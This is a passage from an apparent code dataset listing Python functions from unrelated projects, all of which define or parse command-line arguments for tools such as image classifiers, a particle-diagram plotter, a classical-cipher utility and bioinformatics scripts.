image_path = './test_images/cautleya_spicata.jpg'\n # image_path = './test_images/orange_dahlia.jpg'\n # image_path = './test_images/wild_pansy.jpg'\n parser.add_argument(\"--file_path\",\n type = str,\n default = './test_images/hard-leaved_pocket_orchid.jpg',\n help = \"Image file path.\")\n\n # Model file name as --model_filename\n parser.add_argument(\"--model_filename\",\n type = str,\n default = 'model_20200422_223607.h5',\n help = \"Model path and file name.\")\n\n # Top k classes to be returned as --top_k with default value 5\n parser.add_argument(\"--top_k\",\n type = int,\n default = 5,\n help = \"Number of epochs. 
Default = 5\")\n\n # json file mapping labels as --category_names\n parser.add_argument(\"--category_names\",\n type = str,\n default = 'label_map.json',\n help = \"json file mapping labels.\")\n\n return parser.parse_args()", "def _get_add_package_args(self, package, type_option, version_option):\n raise NotImplementedError()", "def parse_args():\r\n parser = argparse.ArgumentParser(description=\"Available Options\")\r\n\r\n parser.add_argument('-i'\r\n ,'--input_path'\r\n ,dest='input_path'\r\n ,type=is_valid_path\r\n ,required=True\r\n ,help = \"Enter the path of the image file to process\")\r\n\r\n args = vars(parser.parse_args())\r\n\r\n #To Display The Command Line Arguments\r\n print(\"## Command Arguments #################################################\")\r\n print(\"\\n\".join(\"{}:{}\".format(i,j) for i,j in args.items()))\r\n print(\"######################################################################\")\r\n\r\n return args", "def _arg2kw(self, mixed_args):\n def insert(dict_, k, v):\n if k in dict_:\n print \"duplicated args : %s \" % kv[0]\n raise ArgParseError\n dict_[k] = v\n \n opts = []\n args = {}\n\n n = len(mixed_args)\n i = 0\n while i < n:\n a = mixed_args[i]\n if a == '-' or a == '--' :\n opts.append(a)\n elif a.startswith(\"---\"):\n print \"invalid args: %s\" % mixed_args\n print \"only the following formats are supported:\"\n print \" arg1\"\n print \" --input=name1\"\n print \" --output name3\"\n print \" -oname2\"\n print \" -o name4\"\n raise ArgParseError\n elif a.startswith(\"--\"):\n kv = a[2:].split(\"=\", 1)\n if len(kv) == 2:\n insert(args, kv[0], kv[1])\n else:\n i += 1\n insert(args, kv[0], mixed_args[i])\n elif a.startswith(\"-\"):\n if len(a) > 2:\n insert(args, a[1], a[2:])\n else:\n i += 1\n insert(args, a[1], mixed_args[i])\n else:\n opts.append(a)\n i += 1\n \n return opts, args", "def get_input_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--json_path', type=str, default='cat_to_name.json', \n help='Json path of labels to categories')\n parser.add_argument('--use_gpu', type=bool, default=False, \n help='Run with GPU')\n parser.add_argument('--topk', type=int, default=5, \n help='Top N classes that needed to be displayed')\n parser.add_argument('--image_path', type=str, default='C:/Users/TsalikiK/Downloads/Kantar/Kantar_Python_Work/Notebooks/aipnd-project/test/1/image_06743.jpg', \n help='Image which you want to predict')\n\n # returns parsed argument collection\n return parser.parse_args()", "def parse_options():\n\n parser = optparse.OptionParser(description='PySpark WordCount.')\n parser.add_option('-i', '--input', action='store', nargs=1,\n default='s3://dimajix-training/data/alice/',\n help='Input file or directory')\n parser.add_option('-o', '--output', action='store', nargs=1,\n default='alice-counts',\n help='Output file or directory')\n\n (opts, args) = parser.parse_args()\n\n return opts", "def handle_cmdline_args():\n\n parser = argparse.ArgumentParser(\n description='Generate synthetic data from a specification in a json '\n 'file using the \"synth-method\" described in the json file. ')\n\n parser.add_argument(\n '-i', dest='infile', required=True,\n help='The input json file. 
Must contain a \"synth-method\" property')\n\n parser.add_argument(\n '-o', dest='outfile_prefix', required=True, help='The prefix of the output paths (data json and csv), relative to the QUIPP-pipeline root directory')\n\n args = parser.parse_args()\n return args", "def get_args(input_args):\n\n parser = argparse.ArgumentParser(\n prog=\"PythiaPlotter\",\n description=\"Convert MC event into a particle evolution diagram. \"\n \"Requires you to choose an input format, and an output printer.\",\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n #################\n # Input options\n #################\n input_group = parser.add_argument_group('Input Options')\n\n input_group.add_argument(\"input\",\n help=\"Input file\")\n\n parser_help = [\"Input formats:\"]\n for k, v in parser_opts.items():\n help_str = \"{0}: {1}\".format(k, v.description)\n if v.file_extension:\n help_str += \" (default for files ending in {})\".format(v.file_extension)\n parser_help.append(help_str)\n\n input_group.add_argument(\"--inputFormat\",\n help=\"\\n\".join(parser_help),\n choices=list(parser_opts.keys()))\n input_group.add_argument(\"-n\", \"--eventNumber\",\n help=\"Select event number to plot, starts at 1.\\n\"\n \"For: HEPMC, LHE input formats.\\n\",\n type=int,\n default=0)\n\n #################\n # Output file options\n #################\n output_group = parser.add_argument_group('Output Diagram Options')\n\n output_group.add_argument(\"-O\", \"--output\",\n help=\"Output diagram filename \"\n \"(if unspecified, defaults to INPUT.pdf)\")\n output_group.add_argument(\"--outputFormat\",\n help=\"Output diagram file format (defaults to \"\n \"extension given to --output)\")\n output_group.add_argument(\"--open\",\n help=\"Automatically open diagram once plotted\",\n action=\"store_true\")\n\n #################\n # Printer options\n #################\n output_group.add_argument(\"--noOutput\",\n help=\"Don't convert Graphviz file to diagram\",\n action=\"store_true\")\n\n output_group.add_argument(\"-r\", \"--representation\",\n help=\"Particle representation for output diagram, \"\n \"either representated by Nodes or as Edges\",\n choices=helpr.VALID_REPRESENTATIONS)\n\n layouts = OrderedDict()\n layouts[\"dot\"] = \"(Default) Hierarchical drawings of directed graphs.\"\n layouts[\"neato\"] = \"'Spring model' layout by minimizing a global energy function.\"\n layouts[\"fdp\"] = \"'Spring model' layout by reducing forces.\"\n layouts[\"sfdp\"] = \"Multiscale version of fdp for the layout of large graphs.\"\n layouts[\"twopi\"] = \"Radial layout. 
Nodes are placed on concentric circles \" \\\n \"depending their distance from a given root node.\"\n layouts[\"circo\"] = \"Circular layout.\"\n layout_help = [\"{}: {}\".format(k, v) for k, v in layouts.items()]\n output_group.add_argument(\"--layout\",\n help=(\"Algorithm to use for arranging nodes & edges:\\n\"\n + \"\\n\".join(layout_help)),\n choices=list(layouts.keys()),\n default=\"dot\")\n\n output_group.add_argument(\"--title\",\n help=\"Title to put on the plot\",\n default=\"\")\n\n printer_help = [\"Printing methods:\"]\n printer_help.extend([\"{0}: {1}\".format(k, v.description)\n for k, v in printer_opts_checked.items()])\n output_group.add_argument(\"-p\", \"--printer\",\n help=\"\\n\".join(printer_help),\n choices=list(printer_opts_checked.keys()),\n default=\"DOT\" if \"DOT\" in printer_opts_checked else \"WEB\")\n\n output_group.add_argument(\"--redundants\",\n help=\"Keep redundant particles (defualt is to remove them)\",\n action=\"store_true\")\n\n output_group.add_argument(\"--saveGraphviz\",\n help=\"Save intermediate GraphViz file (for testing puposes, \"\n \"or quick style edits)\",\n action=\"store_true\")\n\n #################\n # Miscellaneous options\n #################\n misc_group = parser.add_argument_group(\"Miscellaneous Options\")\n dump_config_key = \"--dumpConfig\"\n misc_group.add_argument(dump_config_key,\n help=\"Dump the default config file. User can then modify it, \"\n \"and use it via --configFile.\")\n misc_group.add_argument(\"--configFile\",\n help=\"Configuration file to use\")\n misc_group.add_argument(\"-v\", \"--verbose\",\n help=\"Print debug statements to screen\",\n action=\"store_true\")\n misc_group.add_argument(\"--stats\",\n help=\"Print some statistics about the event/graph\",\n action=\"store_true\")\n misc_group.add_argument('--version', action='version', version='%(prog)s ' + __version__)\n\n # Handle the scenario where there are no printers available\n if len(printer_opts_checked) == 0:\n parser.print_help()\n log.info(\"\")\n log.error(\"None of the required programs or python packages \"\n \"for any printing option exist.\")\n print_printers_requirements(log.info)\n exit(11)\n\n # Can generate default config file and exit before doing any parsing\n if dump_config_key in sys.argv:\n dump_default_config()\n exit(0)\n\n args = parser.parse_args(input_args)\n\n if args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n args.input = helpr.cleanup_filepath(args.input) # sanitise input\n\n if not helpr.check_file_exists(args.input):\n raise IOError(\"No such file: '%s'\" % args.input)\n\n # Post process user args\n set_default_output_settings(args)\n set_default_input_format(args)\n set_default_mode(args)\n load_default_user_configs(args)\n\n for k, v in args.__dict__.items():\n log.debug(\"%s: %s\", k, v)\n\n return args", "def parse_args():\n usage = (\"Usage: python driver.py k-number-of-output-colors \"\n \"{kmeans, kmeans++} /path/to/image.jpg\")\n assert len(sys.argv) >= 2, \"Too few arguements. \" + usage\n\n # Determine k\n assert sys.argv[1].isdigit(), (\"k-number-of-output-colors needs to be a \"\n \"digit. \" + usage)\n k = int(sys.argv[1])\n\n # Determine algorithm type (optional input)\n try:\n assert sys.argv[2] in {\"kmeans\", \"kmeans++\"}, (\"Invalid algorithm \"\n \"type. 
\" + usage)\n algorithm_type = sys.argv[2]\n except IndexError:\n print \"No algorithm type given in args; using default algorithm 'kmeans'\"\n algorithm_type = \"kmeans\"\n \n # Determine image path (optional input)\n try:\n img_path = sys.argv[3]\n except IndexError:\n print \"No image path given in args; using default image './park.jpg'\"\n img_path = \"./park.jpg\"\n\n return k, algorithm_type, img_path", "def retrieve_args_dict():\n process_args = sys.argv[1:]\n dictionary = dict()\n for process_arg in process_args:\n splitted = process_arg.split(\":\")\n if len(splitted) > 1:\n key = splitted[0]\n value = \"\".join(splitted[1:])\n dictionary[key] = value\n return dictionary", "def extract_info_from_arguments(self):\r\n\r\n for sample_name in self.arguments['--sample_name']:\r\n self.list_of_samples_to_be_combined.append(sample_name)\r\n\r\n for file_path in self.arguments['--input_file']:\r\n file_object = Input_file(file_path, self.list_of_samples_to_be_combined)\r\n self.indices.update(file_object.indices)\r\n self.list_of_input_files.append(file_object)\r\n self.list_of_input_files_paths.append(file_path)\r\n\r\n if self.arguments['--out']:\r\n if self.arguments['--output_format'] == 'COMPRESSED':\r\n self.compressed = True\r\n elif self.arguments['--output_format'] == 'UNCOMPRESSED':\r\n self.compressed = False\r\n else:\r\n if self.list_of_input_files[0].compressed:\r\n self.compressed = True\r\n else:\r\n self.compressed = False", "def __set_parser__(parser):\n #parser.add_argument('dictionaryFile', metavar='DSL_FILE', type=argparse.FileType('r', encoding='utf-16le'), help=\"a DSL dictionary file\")\n parser.add_argument('dictionaryFile', metavar='DSL_FILE', help=\"a DSL dictionary file\")\n subgroup_opath = parser.add_mutually_exclusive_group()\n subgroup_opath.add_argument('outputDictionaryPath', metavar='OUTPUT_DIR', nargs='?', default=os.getcwd(),\n help=\"Use an OUTPUT_DIR to place Apple Dictionary Service folder (uses current directory by default)\")\n parser.add_argument('-v', '--verbose', action='count', default=0,\n help=\"Increases output verbosity\")\n group = parser.add_argument_group('Fine tuning')\n subgroup_ann = group.add_mutually_exclusive_group()\n subgroup_ann.add_argument('--annotation', metavar='FILE', dest='annotationFile', default=None,\n help=\"Use FILE as annotation file\")\n subgroup_ann.add_argument('--no-annotation', dest='annotationFile', action='store_false',\n help=\"Ignore annotation files\")\n subgroup_abrv = group.add_mutually_exclusive_group()\n subgroup_abrv.add_argument('--abbreviations', metavar='FILE', dest='abbreviationsFile', default=None,\n help=\"Use FILE as abbreviations file\")\n subgroup_abrv.add_argument('--no-abbreviations', dest='abbreviationsFile', action='store_false',\n help=\"Ignore abbreviations files\")\n group.add_argument('--name', metavar='NAME', dest='dictionaryName', help=\"set dictionary name\")\n #subgroup_media = group.add_mutually_exclusive_group()\n #subgroup_media.add_argument('--no-media', action='store_true', dest='media',\n #help=\"Skip media entries\")\n #ubgroup_media.add_argument('--media', metavar='TYPE', choices=['wav', 'mp3', 'm4a', 'aac'],\n #help=\"Change media type to TYPE. Supported formats are \\'wav\\', \\'mp3\\', \\'m4a\\', and \\'aac\\'\")\n group.add_argument('--encoding', metavar='ENCODING', default='utf-16', choices=['utf-8', 'utf-16', 'utf-16le', 'utf-16be'],\n help=\"Set DSL dictionary encoding, suppored encodings are \\'utf-8\\' and \\'utf-16\\' (default). 
If in latter encoding the Byte Order Mark is is missing use \\'utf-16le\\' or \\'utf-16be\\'.\")\n parser.add_argument('--version', action='version', version=\"lexicamaker v%s\" % __version__ ) #\"%(prog)s v{}\".format(__version__))\n subgroup_opath.add_argument('--remote', action='store_true',\n help=\"Forces to place the Apple Dictionary Service folder next to main DSL_FILE dictionary\")", "def handle_args():\n usage = \"\"\"usage: %prog [options] transient_id voevent_stream_id outputname.xml\"\"\"\n parser = optparse.OptionParser(usage)\n\n dbname_default = tkp.config.config['database']['name']\n parser.add_option(\"--dbname\", default=dbname_default,\n help=\"Database name, default: \" + dbname_default)\n\n options, args = parser.parse_args()\n if len(args) != 3:\n parser.print_help()\n sys.exit(1)\n print \"Generating VOEvent for transient id:\", args[0]\n return options, args", "def parse_args_dict(args=None):\n return vars(parse_args(args))", "def parse_arguments(args: list = None) -> Dict[str, str]:\n arg_parser = argparse.ArgumentParser(description=\"Console command to crypt \"\n \"and decrypt texts using \"\n \"classic methods. It also \"\n \"performs crypto attacks \"\n \"against those methods.\\n\",\n epilog=\"Follow cifra development at: \"\n \"<https://github.com/dante-signal31/cifra>\")\n cifra_subparsers = arg_parser.add_subparsers(help=\"Available modes\",\n dest=\"mode\",\n required=True)\n # DICTIONARY MANAGEMENT.\n dictionary_parser = cifra_subparsers.add_parser(name=\"dictionary\",\n help=\"Manage dictionaries to \"\n \"perform crypto attacks.\")\n dictionary_actions_subparser = dictionary_parser.add_subparsers(help=\"Action to perform.\",\n dest=\"action\")\n # DICTIONARY CREATION.\n dictionary_create_parser = dictionary_actions_subparser.add_parser(name=\"create\",\n help=\"Create a dictionary of unique words.\")\n dictionary_create_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to create.\",\n metavar=\"NEW_DICTIONARY_NAME\")\n dictionary_create_parser.add_argument(\"-i\", \"--initial_words_file\",\n type=_check_is_file,\n help=\"Optionally you can load in the dictionary words located in a text file\",\n metavar=\"PATH_TO FILE_WITH_WORDS\")\n # DICTIONARY REMOVAL.\n dictionary_delete_parser = dictionary_actions_subparser.add_parser(name=\"delete\",\n help=\"Remove an existing dictionary.\")\n dictionary_delete_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to delete.\",\n metavar=\"DICTIONARY_NAME_TO_DELETE\")\n # DICTIONARY UPDATING.\n dictionary_update_parser = dictionary_actions_subparser.add_parser(name=\"update\",\n help=\"Add words to an existing dictionary.\")\n dictionary_update_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to update with additional words.\",\n metavar=\"DICTIONARY_NAME_TO_UPDATE\")\n dictionary_update_parser.add_argument(\"words_file\",\n type=_check_is_file,\n help=\"Pathname to a file with words to add to dictionary\",\n metavar=\"PATH_TO_FILE_WITH_WORDS\")\n # DICTIONARY LISTING.\n _ = dictionary_actions_subparser.add_parser(name=\"list\",\n help=\"Show existing dictionaries.\")\n # CIPHER MANAGEMENT.\n cipher_parser = cifra_subparsers.add_parser(name=\"cipher\",\n help=\"Cipher a text using a key.\")\n cipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to cipher.\",\n metavar=\"ALGORITHM_NAME\")\n cipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to 
use to cipher.\",\n metavar=\"CIPHERING_KEY\")\n cipher_parser.add_argument(\"file_to_cipher\",\n type=_check_is_file,\n help=\"Path to file with text to cipher.\",\n metavar=\"FILE_TO_CIPHER\")\n cipher_parser.add_argument(\"-o\", \"--ciphered_file\",\n type=str,\n help=\"Path to output file to place ciphered text. If not used then\"\n \"ciphered text will be dumped to console.\",\n metavar=\"OUTPUT_CIPHERED_FILE\")\n cipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # DECIPHERING MANAGEMENT\n decipher_parser = cifra_subparsers.add_parser(name=\"decipher\",\n help=\"Decipher a text using a key.\")\n decipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to decipher.\",\n metavar=\"ALGORITHM_NAME\")\n decipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to decipher.\",\n metavar=\"CIPHERING_KEY\")\n decipher_parser.add_argument(\"file_to_decipher\",\n type=_check_is_file,\n help=\"Path to file with text to decipher.\",\n metavar=\"FILE_TO_DECIPHER\")\n decipher_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n decipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # ATTACK MANAGEMENT\n attack_parser = cifra_subparsers.add_parser(name=\"attack\",\n help=\"Attack a ciphered text to get its plain text\")\n attack_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to attack.\",\n metavar=\"ALGORITHM_NAME\")\n attack_parser.add_argument(\"file_to_attack\",\n type=_check_is_file,\n help=\"Path to file with text to attack.\",\n metavar=\"FILE_TO_ATTACK\")\n attack_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. 
If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n attack_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n\n parsed_arguments = vars(arg_parser.parse_args(args))\n filtered_parser_arguments = {key: value for key, value in parsed_arguments.items()\n if value is not None}\n return filtered_parser_arguments", "def get_parsed_cmd_args(self, test_case=None):\n\n class BooleanAction(argparse.Action):\n \"\"\"Custom action for storing boolean options\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(BooleanAction, self).__init__(*args, **kwargs)\n\n def __call__(self, parser, namespace, value, option_string):\n setattr(namespace, self.dest, value not in [\"False\", \"false\"])\n\n class ArrayAction(argparse.Action):\n \"\"\"Custom action for storing comma seperated arrays\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(ArrayAction, self).__init__(*args, **kwargs)\n\n def __call__(self, parser, namespace, value, option_string):\n setattr(namespace, self.dest, value.split(\",\"))\n\n argument_parser = argparse.ArgumentParser(\n description=\"Encryption identification scanner: \" \\\n + \"scans a set of packages to detect use of encryption algorithms.\",\n epilog=\"For additional information, visit: \" \\\n + \"https://github.com/Wind-River/crypto-detector\")\n\n argument_parser.add_argument(\"--version\", \\\n action='version', version=self.version)\n\n # automatically generate options for methods\n\n for method in Options.available_methods():\n\n method_class = Options.available_methods()[method]\n\n if not hasattr(method_class, \"options\"):\n continue\n\n for option in method_class.options:\n self.options[method + \"_\" + option] = method_class.options[option]\n self.method_options[method + \"_\" + option] = (method, option)\n\n if hasattr(method_class, \"options_help\"):\n self.options_help.update({\n method + \"_\" + option: method_class.options_help[option] \\\n for option in method_class.options_help})\n\n for option in self.options:\n\n if option == \"packages\":\n continue\n\n additional_args = {}\n\n if isinstance(self.options[option], list):\n additional_args[\"action\"] = ArrayAction\n\n elif isinstance(self.options[option], bool):\n additional_args[\"nargs\"] = \"?\"\n additional_args[\"choices\"] = [\"True\", \"true\", \"False\", \"false\"]\n additional_args[\"action\"] = BooleanAction\n\n elif option == \"output_existing\":\n additional_args[\"choices\"] = [\"rename\", \"overwrite\", \"skip\"]\n\n self.parse_cmd_argument(argument_parser, option, additional_args)\n\n argument_parser.add_argument(nargs='*', dest=\"packages\", help=self.options_help[\"packages\"])\n\n if test_case:\n return vars(argument_parser.parse_args(test_case))\n\n return vars(argument_parser.parse_args())", "def process_cmd_opts():\n # def print_version():\n # pkg_name = 'ndn-distributed-repo'\n # version = pkg_resources.require(pkg_name)[0].version\n # print(pkg_name + ' ' + version)\n\n def process_prefix(input_string: str):\n if input_string[-1] == \"/\":\n input_string = input_string[:-1]\n if input_string[0] != \"/\":\n input_string = \"/\" + input_string\n return input_string\n\n def process_others(input_string: str):\n if input_string[-1] == \"/\":\n input_string = input_string[:-1]\n if input_string[0] == \"/\":\n input_string = input_string[1:]\n return input_string\n\n def parse_cmd_opts():\n\n 
# Command Line Parser\n parser = argparse.ArgumentParser(add_help=False,description=\"ndn-distributed-repo\")\n requiredArgs = parser.add_argument_group(\"required arguments\")\n optionalArgs = parser.add_argument_group(\"optional arguments\")\n informationArgs = parser.add_argument_group(\"information arguments\")\n\n # Adding all Command Line Arguments\n requiredArgs.add_argument(\"-rp\",\"--repoprefix\",action=\"store\",dest=\"repo_prefix\",required=True,help=\"repo (group) prefix. Example: \\\"/samplerepo\\\"\")\n requiredArgs.add_argument(\"-gp\", \"--svsgroupprefix\",action=\"store\",dest=\"svs_group_prefix\",required=True,help=\"prefix of svs group. Example: \\\"/repogroup\\\"\")\n requiredArgs.add_argument(\"-n\", \"--nodename\",action=\"store\",dest=\"node_name\",required=True,help=\"node name. Example: \\\"node01\\\"\")\n requiredArgs.add_argument(\"-s\", \"--sessionid\",action=\"store\",dest=\"session_id\",required=True,help=\"id of this session. Example: \\\"2c4f\\\"\")\n\n # Getting all Arguments\n vars = parser.parse_args()\n args = {}\n\n # Process args\n args[\"repo_prefix\"] = process_prefix(vars.repo_prefix)\n args[\"node_name\"] = process_others(vars.node_name)\n args[\"session_id\"] = process_others(vars.session_id)\n args[\"file_storage\"] = \"~/.ndn/repo/{repo_prefix}/{session_id}/file.db\".format(repo_prefix=args[\"repo_prefix\"], session_id=args[\"session_id\"])\n args[\"global_view_storage\"] = \"~/.ndn/repo/{repo_prefix}/{session_id}/global_view.db\".format(repo_prefix=args[\"repo_prefix\"], session_id=args[\"session_id\"])\n args[\"svs_storage\"] = \"~/.ndn/repo/{repo_prefix}/{session_id}/svs.db\".format(repo_prefix=args[\"repo_prefix\"], session_id=args[\"session_id\"])\n args[\"svs_group_prefix\"] = process_prefix(vars.svs_group_prefix)\n \n return args\n\n args = parse_cmd_opts()\n \"\"\"\n if args.version:\n print_version()\n exit(0)\n \"\"\"\n return args", "def parse_args():\n parser = argparse.ArgumentParser(description=\"generate training data of apks\")\n parser.add_argument(\"-i\", action=\"store\", dest=\"input_file\",\n required=True, help=\"input json file to predict\")\n parser.add_argument(\"-o\", action=\"store\", dest=\"output_file\",\n required=True, help=\"file path to store predicted data\")\n parser.add_argument(\"-server\", action=\"store\", dest=\"server_url\", default=\"http://localhost:5745\",\n required=False, help=\"url of nice2predict server\")\n options = parser.parse_args()\n print options\n return options", "def get_options_lookup():\r\n qiime_config = load_qiime_config()\r\n result = {}\r\n result['fasta_as_primary_input'] =\\\r\n make_option('-i', '--input_fasta_fp', type=\"existing_filepath\",\r\n help='path to the input fasta file')\r\n result['otu_table_as_primary_input'] =\\\r\n make_option('-i', '--otu_table_fp', type=\"existing_filepath\",\r\n help='path to the input OTU table (i.e., the output from make_otu_table.py)')\r\n result['otu_map_as_primary_input'] =\\\r\n make_option('-i', '--otu_map_fp', type=\"existing_filepath\",\r\n help='path to the input OTU map (i.e., the output from pick_otus.py)')\r\n result['log_fp'] =\\\r\n make_option('-l', '--log_fp', type=\"new_filepath\",\r\n help='path to write the log file')\r\n result['input_fasta'] =\\\r\n make_option('-f', '--input_fasta_fp', type=\"existing_filepath\",\r\n help='path to the input fasta file')\r\n result['output_dir'] =\\\r\n make_option('-o', '--output_dir', type=\"new_dirpath\",\r\n help='path to the output directory')\r\n result['output_fp'] =\\\r\n 
make_option('-o', '--output_fp', type=\"new_filepath\",\r\n help='the output filepath')\r\n result['output_biom_fp'] =\\\r\n make_option('-o', '--output_biom_fp', type=\"new_filepath\",\r\n help='the output otu table in biom format (recommended extension: .biom)')\r\n result['mapping_fp'] =\\\r\n make_option('-m', '--mapping_fp', type=\"existing_filepath\",\r\n help='the mapping filepath')\r\n\r\n # Define options used by the workflow scripts\r\n result['jobs_to_start_workflow'] =\\\r\n make_option('-O', '--jobs_to_start', type='int',\r\n help='Number of jobs to start. NOTE: you must also'\r\n ' pass -a to run in parallel, this defines the number of'\r\n ' jobs to be started if and only if -a is passed'\r\n ' [default: %default]',\r\n default=qiime_config['jobs_to_start'])\r\n\r\n # Define options used by the parallel scripts\r\n result['jobs_to_start'] =\\\r\n make_option('-O', '--jobs_to_start', type='int',\r\n help='Number of jobs to start [default: %default]',\r\n default=qiime_config['jobs_to_start'])\r\n result['retain_temp_files'] =\\\r\n make_option('-R', '--retain_temp_files', action='store_true',\r\n help='retain temporary files after runs complete ' +\r\n '(useful for debugging) [default: %default]',\r\n default=False)\r\n result['suppress_submit_jobs'] =\\\r\n make_option('-S', '--suppress_submit_jobs', action='store_true',\r\n help='Only split input and write commands file - don\\'t submit ' +\r\n 'jobs [default: %default]', default=False)\r\n result['poll_directly'] =\\\r\n make_option('-T', '--poll_directly', action='store_true',\r\n help='Poll directly for job completion rather than running ' +\r\n 'poller as a separate job. If -T is specified this script will ' +\r\n 'not return until all jobs have completed. [default: %default]',\r\n default=False)\r\n result['cluster_jobs_fp'] =\\\r\n make_option('-U', '--cluster_jobs_fp',\r\n help='path to cluster jobs script (defined in qiime_config) ' +\r\n ' [default: %default]',\r\n default=qiime_config['cluster_jobs_fp'] or\r\n 'start_parallel_jobs.py')\r\n result['suppress_polling'] =\\\r\n make_option('-W', '--suppress_polling', action='store_true',\r\n help='suppress polling of jobs and merging of results ' +\r\n 'upon completion [default: %default]',\r\n default=False)\r\n result['job_prefix'] =\\\r\n make_option('-X', '--job_prefix', help='job prefix ' +\r\n '[default: descriptive prefix + random chars]')\r\n result['seconds_to_sleep'] =\\\r\n make_option('-Z', '--seconds_to_sleep', type='int',\r\n help='Number of seconds to sleep between checks for run ' +\r\n ' completion when polling runs [default: %default]',\r\n default=qiime_config['seconds_to_sleep'] or 60)\r\n\r\n return result", "def get_args():\n\n params = {}\n\n if len(argv) == 1:\n\n input_file = input('Please enter the path to the parameter file: ')\n\n else:\n\n input_file = argv[1]\n\n if path.isfile(input_file) == False:\n\n print('ERROR: Cannot find input parameter file')\n exit()\n\n flines = open(input_file,'r').readlines()\n\n str_keys = ['catalog_file', 'red_dir',\n 'target_ra', 'target_dec',\n 'star_class', 'isochrone_file',\n 'target_lc_file_g', 'target_lc_file_r', 'target_lc_file_i']\n\n for line in flines:\n\n (key, value) = line.replace('\\n','').split()\n\n if key in str_keys:\n\n params[key] = value\n\n else:\n\n if 'none' not in str(value).lower():\n params[key] = float(value)\n else:\n params[key] = None\n\n return params", "def get_argument_parser():\n description = (\n \"Create an override for each recipe listed in an Autopkg recipe-list. 
\"\n \"or a supplied list of recipe identifiers. (Defaults to current \"\n \"user's AutoPkgr recipe_list) . The 'Input' will be renamed to \"\n \"'Input_Original', and a new 'Input' section will be populated with \"\n \"metadata from the most current production version of that product, \"\n \"followed by metadata from the 'Input_Original' for any blank values. \"\n \"Finally, (optionally with -p/--pkginfo), a plist of values is added \"\n \"to the 'Input' 'pkginfo' key.\")\n epilog = (\"Please see the README for use examples and further \"\n \"description. Why don't you cut your hair?\")\n parser = argparse.ArgumentParser(description=description, epilog=epilog)\n arg_help = (\"Path to a location other than your autopkg override-dir \"\n \"to save overrides.\")\n parser.add_argument(\"-o\", \"--override-dir\", help=arg_help)\n\n group = parser.add_mutually_exclusive_group()\n arg_help = (\"Path to a recipe list. If not specified, defaults to use \"\n \"AutoPkgr's recipe_list at \"\n \"~/Library/Application Support/AutoPkgr.\")\n group.add_argument(\"-l\", \"--recipe-list\", help=arg_help)\n arg_help = \"One or more recipe identifiers for which to create overrides.\"\n group.add_argument(\"-r\", \"--recipes\", help=arg_help, nargs=\"+\")\n\n arg_help = (\"Input metadata key names (may specify multiple values) to \"\n \"copy from newest production version to 'Input'. Defaults to: \"\n \"%(default)s\")\n parser.add_argument(\"-k\", \"--keys\", help=arg_help, nargs=\"+\",\n default=METADATA)\n arg_help = (\"Path to a plist file defining override values to enforce. \"\n \"This plist should have a top-level dict element named \"\n \"'pkginfo'. \")\n parser.add_argument(\"-p\", \"--pkginfo\", help=arg_help)\n arg_help = (\"Name of Munki catalog from which to search current pkginfo \"\n \"values. (Defaults to '%(default)s)'\")\n parser.add_argument(\"-c\", \"--catalog\", help=arg_help, default=\"production\")\n arg_help = (\"Skip copying subdirectory information from existing items. \"\n \" Most Munki recipes provide access to the MunkiImporter \"\n \"`repo_subdirectory` argument in the Input section as \"\n \"`MUNKI_REPO_SUBDIR`. By default, easy_rider will use the \"\n \"directory found in the most recent production version of the \"\n \"product to populate the Input value, unless the recipe \"\n \"does not offer that override, or if you suppress that \"\n \"behavior with this option.\")\n parser.add_argument(\"--suppress_subdir\", help=arg_help,\n action=\"store_true\")\n arg_help = (\"Do not interactively prompt for values. When no value exists \"\n \"in the most recent production version of a product, this \"\n \"option instructs easy_rider to just enter a blank string.\")\n parser.add_argument(\"--no_prompt\", help=arg_help, action=\"store_true\")\n arg_help = (\"Instead of using current production value for \"\n \"repo_subdirectory, either prompt for input (no value) or \"\n \"use the value of a pkginfo key (e.g. 
